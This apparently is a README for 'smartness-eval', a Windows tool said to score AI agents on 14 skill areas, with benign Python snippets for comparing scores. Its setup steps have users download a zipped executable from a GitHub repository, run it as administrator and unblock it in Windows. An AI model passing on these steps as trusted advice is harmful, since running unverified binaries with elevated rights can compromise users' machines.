smartness-eval is a Windows-ready tool for checking how well an AI agent performs across 14 skill areas. It helps you run a guided assessment, review the results, and compare agents on the same set of tasks.
This project is built for end users who want a direct way to test agent quality without building a complex evaluation setup. It draws on ideas from CLEAR, T-Eval, and Anthropic-style agent evaluation while keeping the process simple.
To run smartness-eval, you need:
- A Windows PC
- At least 4 GB of RAM
- 500 MB of free disk space
- A stable internet connection for the first setup
- Permission to run downloaded apps on your device
For the best results, use Windows 10 or Windows 11.
To download and install smartness-eval:
- Open this page: https://github.com/Compound-epigraphy786/smartness-eval
- Find the download area on the repository page
- Download the package for Windows
- If the file is zipped, right-click it and choose Extract All
- Open the extracted folder
- Double-click the app or launcher file to start the tool
If Windows asks for approval, choose Run or Yes.
When you open the app for the first time, it will load the assessment workspace and prepare the default test set.
Follow these steps:
- Start the app
- Wait for the main screen to load
- Choose the AI agent you want to assess
- Pick a test profile or use the default one
- Begin the evaluation run
The first run may take a little longer while the app finishes its setup.
smartness-eval reviews an AI agent across these 14 core areas:
- Task focus
- Instruction following
- Reasoning
- Tool use
- Memory use
- Self-checking
- Error handling
- Consistency
- Planning
- Response clarity
- Context handling
- Adaptation
- Safety sense
- Overall reliability
These areas help you see where an agent does well and where it needs work.
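If you want to work with per-area results yourself, the idea of finding where an agent does well and where it needs work can be sketched in a few lines of Python. This is a minimal, hypothetical example: it assumes a run's results are available as a mapping from each of the 14 area names to a score from 0 to 100, and the name `strengths_and_gaps` is illustrative. smartness-eval's actual result format and scoring scale may differ.

```python
# Hypothetical sketch: smartness-eval's real result format may differ.
# Assumes every dimension is scored on a 0-100 scale.
from __future__ import annotations

DIMENSIONS = [
    "Task focus", "Instruction following", "Reasoning", "Tool use",
    "Memory use", "Self-checking", "Error handling", "Consistency",
    "Planning", "Response clarity", "Context handling", "Adaptation",
    "Safety sense", "Overall reliability",
]


def strengths_and_gaps(scores: dict[str, float], n: int = 3) -> tuple[list[str], list[str]]:
    """Return the n strongest dimensions (highest first) and the n weakest (lowest first)."""
    missing = [d for d in DIMENSIONS if d not in scores]
    if missing:
        raise ValueError(f"missing scores for: {', '.join(missing)}")
    # Highest score first; dimensions with equal scores keep their DIMENSIONS order.
    ranked = sorted(DIMENSIONS, key=lambda d: scores[d], reverse=True)
    strongest = ranked[:n]
    weakest = ranked[-n:][::-1]  # lowest score first
    return strongest, weakest
```

For example, with most areas at 80, Reasoning at 92, Planning at 55, and Tool use at 45, `strengths_and_gaps(scores, n=2)` returns Reasoning and Task focus as strengths and Tool use and Planning as gaps.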
After each run, the tool shows a score for each of the 14 dimensions. You can use the results to:
- Compare agents side by side
- Check one agent over time
- Spot weak areas quickly
- Review results with a simple score summary
- Save a record of each assessment
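A side-by-side comparison comes down to pairing two agents' scores for each dimension and sorting by the size of the gap. The Python sketch below assumes, hypothetically, that each report has been loaded into a dictionary that maps dimension names to scores; `compare_side_by_side` and `print_table` are illustrative names, not part of smartness-eval.

```python
# Hypothetical sketch: the score dictionaries stand in for two
# smartness-eval reports; the real export format may differ.
from __future__ import annotations


def compare_side_by_side(
    a: dict[str, float], b: dict[str, float]
) -> list[tuple[str, float, float, float]]:
    """Pair up scores for the dimensions both agents were scored on.

    Returns (dimension, score_a, score_b, score_b - score_a) rows, with
    the largest gaps between the two agents first.
    """
    shared = [d for d in a if d in b]
    rows = [(d, a[d], b[d], b[d] - a[d]) for d in shared]
    # Largest absolute difference first; ties keep the order of `a`.
    rows.sort(key=lambda row: abs(row[3]), reverse=True)
    return rows


def print_table(
    rows: list[tuple[str, float, float, float]],
    name_a: str = "Agent A",
    name_b: str = "Agent B",
) -> None:
    """Print the rows as a fixed-width, side-by-side table."""
    print(f"{'Dimension':<24}{name_a:>10}{name_b:>10}{'Diff':>8}")
    for dim, score_a, score_b, diff in rows:
        print(f"{dim:<24}{score_a:>10.1f}{score_b:>10.1f}{diff:>+8.1f}")
```

For example, comparing `{"Reasoning": 78.0, "Tool use": 62.0}` with `{"Reasoning": 81.0, "Tool use": 48.0}` puts the Tool use row first, because its 14-point gap is larger than the 3-point gap in Reasoning.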
The report is meant to be easy to read, even if you do not work with AI tools every day.
Use smartness-eval like this:
- Open the app
- Load the agent you want to test
- Select the evaluation set
- Run the assessment
- Read the score panel
- Export or save the report if you need it later
If you are checking more than one agent, use the same test set for each run so the results stay fair.
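Before comparing agents, it can help to confirm that every run really used the same test set. The Python sketch below shows one way to check this. The `RunRecord` class and its `test_set` and `task_ids` fields are hypothetical stand-ins for whatever a saved smartness-eval report actually records.

```python
# Hypothetical sketch: RunRecord and its fields are illustrative,
# not documented smartness-eval output.
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class RunRecord:
    agent: str
    test_set: str              # name of the evaluation set used for the run
    task_ids: frozenset[str]   # the individual tasks that were actually run


def check_comparable(runs: list[RunRecord]) -> None:
    """Raise ValueError unless every run used the same test set and tasks."""
    if not runs:
        raise ValueError("no runs to compare")
    first = runs[0]
    for run in runs[1:]:
        if run.test_set != first.test_set:
            raise ValueError(
                f"{run.agent} used test set {run.test_set!r}, expected {first.test_set!r}"
            )
        if run.task_ids != first.task_ids:
            # Symmetric difference: tasks present in one run but not the other.
            diff = sorted(run.task_ids ^ first.task_ids)
            raise ValueError(f"{run.agent} differs from {first.agent} on tasks: {diff}")
```

Failing loudly here is deliberate: a score gap between two runs only means something if both agents faced the same tasks.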
If the app does not start:
- Make sure the download finished
- Check that you extracted the files if they came in a ZIP folder
- Right-click the app and choose Run as administrator
- Restart your PC and try again
If Windows blocks the file:
- Right-click the file and choose Properties
- On the General tab, look for an Unblock check box
- Select it, choose Apply, and reopen the app
If the app seems stuck while loading:
- Wait a few moments
- Close the app and open it again
- Make sure your internet connection is active if the app needs to fetch data
Key features:
- 14-dimension AI agent scoring
- Simple Windows setup
- Clear result view
- Side-by-side comparison support
- Repeatable test runs
- Clear summary of strengths and gaps
- Draws on established evaluation approaches such as CLEAR and T-Eval
After setup, you may see files like these:
- App launcher
- Config files
- Test sets
- Result output
- Logs
Leave the folder structure as it is unless the app asks you to change something.
smartness-eval is a good fit for:
- People who want to test an AI agent on Windows
- Teams that need a simple evaluation flow
- Users who want a score-based review of agent behavior
- Anyone comparing AI agent quality across the same tasks
Visit this page to download and run the app on Windows:
https://github.com/Compound-epigraphy786/smartness-eval
- Open the download page
- Download the Windows file
- Extract it if needed
- Open the app
- Run your first assessment
The app may show:
- A start screen
- Agent selection
- Test set choice
- Progress status
- Score results
- Export options
Each step is designed to keep the process simple and easy to follow.
An AI agent can sound convincing and still fail key tasks. A fixed assessment makes its real performance easier to see. smartness-eval gives you a direct way to measure that performance with the same rules every time.
A few tips:
- Keep the app in a folder you can find again
- Do not move files while the app is open
- Use the same Windows account for each run to keep results consistent
- Keep your system updated for smoother app behavior